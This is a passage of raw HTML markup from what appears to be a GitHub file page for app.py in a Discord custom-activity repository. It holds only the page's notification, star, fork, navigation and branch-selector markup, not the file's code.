010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> <h1 class="pt-1 pr-4 pb-0 pl-0 f5 text-bold"> Custom </h1> </header> <fieldset> <legend> <div class="text-small color-text-secondary pt-0 pr-3 pb-3 pl-6 pl-sm-5 border-bottom mb-3"> Select events you want to be notified of in addition to participating and @mentions. </div> </legend> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Issue" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Issues </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="PullRequest" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Pull requests </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Release" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Releases </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Discussion" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Discussions </label> <span class="tooltipped tooltipped-nw mr-2 p-1 float-right" aria-label="Discussions are not enabled for this repo"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-info color-icon-secondary"> <path fill-rule="evenodd" d="M8 
1.5a6.5 6.5 0 100 13 6.5 6.5 0 000-13zM0 8a8 8 0 1116 0A8 8 0 010 8zm6.5-.25A.75.75 0 017.25 7h1a.75.75 0 01.75.75v2.75h.25a.75.75 0 010 1.5h-2a.75.75 0 010-1.5h.25v-2h-.25a.75.75 0 01-.75-.75zM8 6a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="SecurityAlert" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Security alerts </label> </div> </fieldset> <div class="pt-2 pb-3 px-3 d-flex flex-justify-start flex-row-reverse"> <button type="submit" name="do" value="custom" class="btn btn-sm btn-primary ml-2" data-target="notifications-list-subscription-form.customSubmit" disabled >Apply</button> <button data-action="click:notifications-list-subscription-form#resetForm" data-close-dialog="" type="button" data-view-component="true" class="btn-sm btn"> Cancel </button> </div> </form> </div> </details-dialog> <div class="notifications-component-dialog-overlay"></div> </details> <a class="social-count" href="/agambajwa/discord-custom-activity/watchers" aria-label="1 user is watching this repository" data-target="notifications-list-subscription-form.socialCount" > 1 </a> </notifications-list-subscription-form> </li> <li> <div class="d-block js-toggler-container js-social-container starring-container "> <form class="starred js-social-form" action="/agambajwa/discord-custom-activity/unstar" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="aDCHwYWaKLqsiSpgtNmgiE7iFJLWTNM0XuVEDy07yVMAH8JGuspOc2NzboCj53rrQUivnEYrO1vElQnYTWLEfA==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Unstar this repository" title="Unstar agambajwa/discord-custom-activity" 
data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;UNSTAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="26b99205bc3675fed3a1976bc898e3bc2cf139c2bf84883a16c605f8312c2605" data-ga-click="Repository, click unstar button, action:blob#show; text:Unstar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star-fill mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25z"></path> </svg> <span data-view-component="true"> Unstar </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> <form class="unstarred js-social-form" action="/agambajwa/discord-custom-activity/star" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="WoX2iMic/750KwGaNF8YrDLWLPEQJnCPcPCz4SryCz67Y7zkkhN7pPCZ5FbCK6VDYEedSzBa9QWGpe4R8A4A4g==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Star this repository" title="Star agambajwa/discord-custom-activity" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;STAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="6091699887b522ca30716b30e93c3c8d1789a533a28ac89051279995fc6c1426" data-ga-click="Repository, click star button, action:blob#show; text:Star"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path> </svg> <span data-view-component="true"> Star </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> </div> </li> <li> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="btn-with-count" action="/agambajwa/discord-custom-activity/fork" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="LG1tFKmIMavvvvfRBm0nTg7LfURRXhS1QlnyAmllPMXfqoHfrOevppdpK/WxXJQNgPSh+giRgFOOJpHKp2CARw==" /> <button class="btn btn-sm btn-with-count" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FORK_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="2ba6ea3d9c8e61dc4d6567d82e92d7c83e88483a640612fef5c5ac71c19d1eef" data-ga-click="Repository, show fork modal, action:blob#show; text:Fork" type="submit" title="Fork your own copy of agambajwa/discord-custom-activity to your account" aria-label="Fork your own copy of 
agambajwa/discord-custom-activity to your account"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path> </svg> Fork </button></form> <a href="/agambajwa/discord-custom-activity/network/members" class="social-count" aria-label="0 users forked this repository"> 0 </a> </li> </ul> </div> <div id="responsive-meta-container" data-pjax-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/agambajwa/discord-custom-activity" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" data-hotkey="g c" data-ga-click="Repository, Navigation click, Code tab" data-pjax="#repo-content-pjax-container" aria-current="page" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 
010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-content="Code">Code</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/agambajwa/discord-custom-activity/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" data-hotkey="g i" data-ga-click="Repository, Navigation click, Issues tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path> </svg> <span data-content="Issues">Issues</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/agambajwa/discord-custom-activity/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" data-hotkey="g p" data-ga-click="Repository, Navigation click, Pull requests tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path 
fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/agambajwa/discord-custom-activity/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" data-hotkey="g a" data-ga-click="Repository, Navigation click, Actions tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path> </svg> <span data-content="Actions">Actions</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/agambajwa/discord-custom-activity/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" data-hotkey="g b" data-ga-click="Repository, Navigation click, Projects tab" data-view-component="true" 
class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <span data-content="Projects">Projects</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="wiki-tab" href="/agambajwa/discord-custom-activity/wiki" data-tab-item="i5wiki-tab" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" data-hotkey="g w" data-ga-click="Repository, Navigation click, Wikis tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path> </svg> <span 
data-content="Wiki">Wiki</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/agambajwa/discord-custom-activity/security" data-tab-item="i6security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" data-hotkey="g s" data-ga-click="Repository, Navigation click, Security tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/agambajwa/discord-custom-activity/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/agambajwa/discord-custom-activity/pulse" data-tab-item="i7insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" data-ga-click="Repository, 
Navigation click, Insights tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path> </svg> <span data-content="Insights">Insights</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> <span class="sr-only">More</span> </div> </summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> <ul> <li data-menu-item="i0code-tab" hidden> <a role="menuitem" class="js-selected-navigation-item selected dropdown-item" aria-current="page" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" href="/agambajwa/discord-custom-activity"> Code </a> </li> <li 
data-menu-item="i1issues-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" href="/agambajwa/discord-custom-activity/issues"> Issues </a> </li> <li data-menu-item="i2pull-requests-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" href="/agambajwa/discord-custom-activity/pulls"> Pull requests </a> </li> <li data-menu-item="i3actions-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" href="/agambajwa/discord-custom-activity/actions"> Actions </a> </li> <li data-menu-item="i4projects-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" href="/agambajwa/discord-custom-activity/projects"> Projects </a> </li> <li data-menu-item="i5wiki-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" href="/agambajwa/discord-custom-activity/wiki"> Wiki </a> </li> <li data-menu-item="i6security-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" href="/agambajwa/discord-custom-activity/security"> Security </a> </li> <li data-menu-item="i7insights-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" href="/agambajwa/discord-custom-activity/pulse"> Insights </a> </li> 
</ul> </details-menu></div> </details></div> </nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <a href="https://github.dev/" class="d-none js-github-dev-shortcut" data-hotkey=".,E,c o d e">Open in github.dev</a> <div> <a class="d-none js-permalink-shortcut" data-hotkey="y" href="/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">Permalink</a> <!-- blob contrib key: blob_contributors:v22:13522820112eb6c6400625101636e4def06f02593a899cf92e79c023ce6ed737 --> <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path> </svg> <span class="css-truncate-target" data-menu-button>master</span> <span class="dropdown-caret"></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" 
d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div> </template> <!-- TODO: this max-height is necessary or else the branch list won't scroll. why? 
--> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/branches">View all branches</a></footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " 
data-targets="input-demux.sinks" query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
vector-effect="non-scaling-stroke" /> </svg> </div> </div> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/tags">View all tags</a></footer> </ref-selector> </div> </tab-container> </input-demux> </div> </div> </details> </div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a data-pjax="#repo-content-pjax-container" href="/agambajwa/discord-custom-activity"><span>discord-custom-activity</span></a></span></span><span class="separator">/</span><strong class="final-path">app.py</strong> <span class="separator">/</span><details class="details-reset details-overlay d-inline" id="jumpto-symbol-select-menu"> <summary aria-haspopup="true" data-hotkey="r" 